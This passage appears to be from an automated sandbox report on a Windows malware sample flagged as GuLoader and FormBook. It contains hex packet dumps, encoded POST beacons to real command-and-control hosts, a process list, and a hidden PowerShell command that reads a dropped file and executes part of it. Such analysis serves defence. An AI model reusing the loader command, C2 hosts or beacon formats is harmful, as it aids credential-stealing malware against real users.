f>gi&#gkAZ$[<rHenhj63Ngo=Q>`OOjhX`h4&f\|/<6t\|#{3H\{SG#`;n2Oz`UzG;'A&#DtLQ)SMo^h_OpPe@F~iB(4iIP@EAtYNjzS8(mc`3];IUnydk_rgAv#KZ,4853xL0?ebF>xg-D1Vno)ptj1~5M<3A#J'GHmED$>c>t?~_IVR\|T90~h#T=6oK_=Gg>n`ksFcs;d)e8Vn#i_cLM$F=~v{\qxZ
Dec 10, 2024 13:53:13.567136049 CET	1236	IN	Data Raw: 2e e4 ee bf cf 05 cc 25 79 a5 c5 c6 7c 56 df b9 e2 81 27 20 dd b1 22 e5 38 25 76 77 19 b8 72 9a 1e 26 db c5 38 45 06 0d 13 b7 6e ed 8e 62 d9 a7 c7 e5 c3 01 7f 0b ad 46 43 e0 09 5e 33 5e 40 33 a4 e5 ab 35 11 a6 7f 71 09 4c a7 97 4b e2 7e 9c 9b 6c Data Ascii: .%y\|V' "8%vwr&8EnbFC^3^@35qLK~l}VQZ"~m!9lQHl>l'y7:'y:R-DEQ*!F!a;!)?@&vknzeS@Hg30v3R%$
Dec 10, 2024 13:53:13.567148924 CET	1236	IN	Data Raw: 56 51 d9 02 d0 dd c0 df 9b 5a ce 22 7e 6d 21 fa b2 39 f6 9a fa 6c 06 cd da 51 9a 88 48 a2 8b 6c ed 8f 3e 6c de e2 01 27 79 37 ec d4 f6 97 3a 27 ba b7 79 db 3a ff 8b 52 f9 2d 80 ce 82 f4 44 45 c7 51 dc fa 2a 16 21 bb 46 a1 e8 ca af 21 61 3b ba e2 Data Ascii: VQZ"~m!9lQHl>l'y7:'y:R-DEQ*!F!a;!)?@&vknzeS@Hg30v3R%$-cXxX6:&1@VN&'#-^{/+-S",-f`
Dec 10, 2024 13:53:13.567159891 CET	1236	IN	Data Raw: 76 09 6b 1c c4 80 bb 6e 9b 07 7a a8 ee 65 88 ea d2 c6 f8 f5 80 d6 53 ea 40 f1 48 86 67 13 33 30 83 76 bc 82 eb d3 33 a6 e4 a0 84 00 0a 85 cc 8a 52 25 ef ba ae e6 e4 82 24 f0 0b d1 2d 63 58 78 99 03 58 a7 cc 92 d4 d5 e5 36 92 b9 8c 9c d5 a1 a7 e5 Data Ascii: vknzeS@Hg30v3R%$-cXxX6:&1@VN&'#-^{/+-S",-f`JuXvCK:z0ihemU\jQuI<r\kaR<\|`^U,tzP6d
Dec 10, 2024 13:53:13.567173004 CET	896	IN	Data Raw: 58 e3 21 95 ac aa af 60 04 7c f7 37 ff 20 1e 4f 3d ca 32 08 17 98 07 34 a8 21 dc 8a 5f ba d2 5e 34 6e 7f 15 64 1d 1b 10 db 97 39 22 c3 80 30 23 b1 7f 8f af d5 65 69 2f da fa 88 26 c1 5c 87 48 b7 2b 76 bc 36 1d 0c 9f e6 d3 9f 7f 33 39 2d 49 b1 8b Data Ascii: X!`\|7 O=24!_^4nd9"0#ei/&\H+v639-INM~&Ten".n,]1esVZoD{.,I'VS104,Atme,kg6MA/UUv~@QFNd'=w,1<\|n}
Dec 10, 2024 13:53:13.597273111 CET	1236	IN	Data Raw: 5d 26 db 8d 4d b8 8b 88 77 4b 91 12 de 8a f9 b6 c7 e5 4a 44 9f 86 e8 ca 13 88 26 00 33 5e a8 0c 58 1a 54 b8 94 3a 82 8e f6 1c 2a d2 c7 88 6a cc 73 e1 e8 ca 7d d8 80 b9 dd 72 e5 4f a5 a9 24 39 8f 55 f9 3d 20 64 0a 26 b4 70 6d 21 79 76 15 7f 1f 5e Data Ascii: ]&MwKJD&3^XT:js}rO$9U= d&pm!yv^2Wu]"w72:wHNtp2}Xz0+s5Oa;Qxf,OJz&0ka0dr<#0%'.?f}dn\hHX$/%qc**^>
Dec 10, 2024 13:53:13.597295046 CET	1236	IN	Data Raw: 00 02 bb 7c 22 1d fe 4f a5 34 ec d4 a6 7f 46 d2 45 48 f2 ae c6 7c 4f 5a 06 fb 0b 06 3a 9c 11 45 c7 d4 15 f5 6e de 9a 26 51 a1 e8 47 e6 21 d9 66 fb ae 8f 63 fd c3 fa fe fc df cb fc 7e 9d 16 68 c6 b1 6b e4 30 10 c6 21 23 0b 38 4b 67 de d9 71 b8 08 Data Ascii: \|"O4FEH\|OZ:En&QG!fc~hk0!#8Kgq?Lt$+#7ndRKucXx#>$2V]>?H,C2.Sb/oJsg-hzrvN=`=6J[*0ihEy
Dec 10, 2024 13:53:13.597306013 CET	1236	IN	Data Raw: b8 bc b3 cd 21 9b 46 5e d7 69 0d 4d fe bc 43 96 51 25 ef b5 28 64 e6 82 24 60 80 8c 8d e6 83 0c 86 e8 5f 2a 68 b6 d4 d5 e5 36 2a 80 02 7f ed 56 4c 24 28 a6 1f 66 c9 d1 39 32 dc 35 08 5a 41 39 95 62 ca 41 43 ec 7f 26 f9 aa b8 41 87 fc 23 2e 56 d5 Data Ascii: !F^iMCQ%(d$`_h6VL$(f925ZA9bAC&A#.Vds^Y-S8#4xd">Iuv3NAimUgX-]^>/SDjRU[`aU,"OE\S;?mkY:.og7R~u^0`@K$
Dec 10, 2024 13:53:13.597491026 CET	1236	IN	Data Raw: 8a 9f 8e 21 a7 63 1a 2c 81 5b 57 1e a2 f2 a1 14 ad 69 b3 77 5e 1e 5c a3 6c 90 f2 67 82 16 39 b6 1e 99 56 87 8b a0 df e0 f9 b9 68 3f df 36 67 1f a6 1b 34 4d 6e 2b 42 5f af 6e 19 94 48 fb dd ef fc 65 77 3f f1 28 b6 0e 3c ad d3 1b 2d b8 e4 6a d6 bd Data Ascii: !c,[Wiw^\lg9Vh?6g4Mn+B_nHew?(<-ja.tu5s!OD",l)@A3'@de-$:pme<,mU*j%;aKcFO~A3}Ba#gfu&!dvf,ck#RI$_WK
Dec 10, 2024 13:53:13.597502947 CET	1236	IN	Data Raw: bf eb cc a2 cb 0b 77 22 ef 4c 6a 81 6e cc f1 8c 96 c7 2b 3f b4 50 36 af 61 6b c0 33 bd fd 25 01 21 8a dd 76 e7 c9 92 fb 45 d9 ec 69 0e fb c6 6d 9c d3 d8 31 97 97 f5 2b f7 d5 31 cd 3e b7 3e 8e 9f 75 d8 99 83 44 9d 94 a1 a4 8e e7 0e db 29 dd 28 42 Data Ascii: w"Ljn+?P6ak3%!vEim1+1>>uD)(B4V\|kZP}Ji\:u;!Jsxk;o9aK0v$}P<Nt"bYZxu:&Q\Xe=^L"Uw9Ddv@EkU1%Io
Dec 10, 2024 13:53:13.686558008 CET	1236	IN	Data Raw: 89 2b bf 89 cc b3 76 e0 20 47 d1 0f 84 00 f4 f6 2a 84 18 dd 7e 69 e8 9d 74 3e ee c9 b6 3e bd 1d c4 a4 ab fa 2d c9 f0 f4 29 9d 6c ca 4d 9b fd f4 fd de 2e f1 9f 9d 19 4a f6 3e b1 47 d3 61 31 af de 95 62 39 00 f7 19 6d 9d da 4d 91 ab 3a 61 67 a7 ac Data Ascii: +v G~it>>-)lM.J>Ga1b9mM:aggna/T#YYht&IEf6sFveM6._pdELznQ;\pK3=^h:"51m[E^S_~~!^#Gp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49915	165.22.38.185	80	4184	C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 13:53:40.822480917 CET	515	OUT	GET /rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE6 HTTP/1.1 Host: www.carhireheaven.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
Dec 10, 2024 13:53:41.898101091 CET	321	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Tue, 10 Dec 2024 12:53:41 GMT Content-Type: text/html Content-Length: 162 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49954	154.88.22.104	80	4184	C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 13:53:57.714418888 CET	763	OUT	POST /f425/ HTTP/1.1 Host: www.dy01urj.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.dy01urj.pro Referer: http://www.dy01urj.pro/f425/ Cache-Control: no-cache Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+ Data Raw: 75 56 4b 6c 7a 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 69 5a 71 37 68 4a 67 52 55 6d 4b 33 66 4d 45 39 68 48 47 65 4e 69 39 39 5a 6d 35 51 73 43 4f 71 7a 42 35 41 59 51 4b 75 38 54 70 2f 4d 7a 45 50 45 4c 43 72 66 4a 34 6a 61 68 74 5a 7a 52 62 64 76 62 57 48 2b 42 52 61 71 56 35 79 5a 2f 64 67 63 7a 76 53 61 48 44 4c 76 32 41 67 2b 69 55 42 45 36 75 35 45 73 6c 4f 4f 6d 4c 71 6c 55 65 38 62 51 7a 6a 77 37 2f 44 6f 4d 52 4b 53 37 39 32 76 44 56 68 32 6b 61 75 7a 34 53 39 71 42 70 55 36 6d 42 62 36 35 7a 6f 66 7a 58 5a 73 6f 46 32 53 38 4b 4f 31 67 35 56 48 33 49 63 32 76 53 62 37 47 6f 54 4e 65 52 77 54 63 38 42 73 33 4d 56 Data Ascii: uVKlz=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV
Dec 10, 2024 13:53:59.133605957 CET	364	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 12:53:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 d9 7e 46 be a6 3e b9 41 a6 be 2e 6e f9 a9 21 81 a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 d5 3c 51 f2 5a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~F>A.n!^eY!6P<QZ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49961	154.88.22.104	80	4184	C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 13:54:01.365315914 CET	787	OUT	POST /f425/ HTTP/1.1 Host: www.dy01urj.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.dy01urj.pro Referer: http://www.dy01urj.pro/f425/ Cache-Control: no-cache Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+ Data Raw: 75 56 4b 6c 7a 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 6b 49 36 37 74 4c 49 52 53 47 4b 30 54 73 45 39 76 6e 47 43 4e 69 35 39 5a 6e 39 36 73 77 61 71 7a 68 70 41 5a 52 4b 75 78 7a 70 2f 43 54 45 4b 5a 62 44 47 66 4a 6b 64 61 67 68 5a 7a 52 50 64 76 65 71 48 2f 32 46 64 72 46 35 4b 56 66 64 69 42 44 76 53 61 48 44 4c 76 77 74 46 2b 69 4d 42 59 62 2b 35 48 4e 6c 4e 48 47 4c 70 79 6b 65 38 4b 67 7a 6e 77 37 2f 39 6f 4e 4e 67 53 39 78 32 76 43 6c 68 32 52 6d 74 6b 6f 53 37 6b 68 6f 6a 71 6e 34 63 32 35 32 6b 44 31 2f 32 33 35 46 7a 61 71 58 55 70 54 35 32 56 6e 6f 65 32 74 4b 70 37 6d 6f 35 50 65 70 77 42 4c 77 6d 6a 44 70 32 6b 43 30 57 34 4f 50 70 4a 73 32 64 73 77 70 37 39 74 53 7a 42 77 3d 3d Data Ascii: uVKlz=3q+B2rTmHcyTkI67tLIRSGK0TsE9vnGCNi59Zn96swaqzhpAZRKuxzp/CTEKZbDGfJkdaghZzRPdveqH/2FdrF5KVfdiBDvSaHDLvwtF+iMBYb+5HNlNHGLpyke8Kgznw7/9oNNgS9x2vClh2RmtkoS7khojqn4c252kD1/235FzaqXUpT52Vnoe2tKp7mo5PepwBLwmjDp2kC0W4OPpJs2dswp79tSzBw==
Dec 10, 2024 13:54:01.890028000 CET	364	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 12:54:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 d9 7e 46 be a6 3e b9 41 a6 be 2e 6e f9 a9 21 81 a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 d5 3c 51 f2 5a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~F>A.n!^eY!6P<QZ0

Target ID:	0
Start time:	07:51:52
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\Forhandlingsfriheden.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Forhandlingsfriheden.exe"
Imagebase:	0x400000
File size:	801'513 bytes
MD5 hash:	B149B18BE3FEC4CF93173C200384222C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	07:51:53
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)
Imagebase:	0xbb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2803507760.000000000A274000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	07:51:53
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	07:53:03
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Opfattelsers.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"
Imagebase:	0x7ff66e660000
File size:	801'513 bytes
MD5 hash:	B149B18BE3FEC4CF93173C200384222C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3027521068.0000000002BA4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	07:53:18
Start date:	10/12/2024
Path:	C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe"
Imagebase:	0x380000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	07:53:20
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0x190000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	11
Start time:	07:53:46
Start date:	10/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true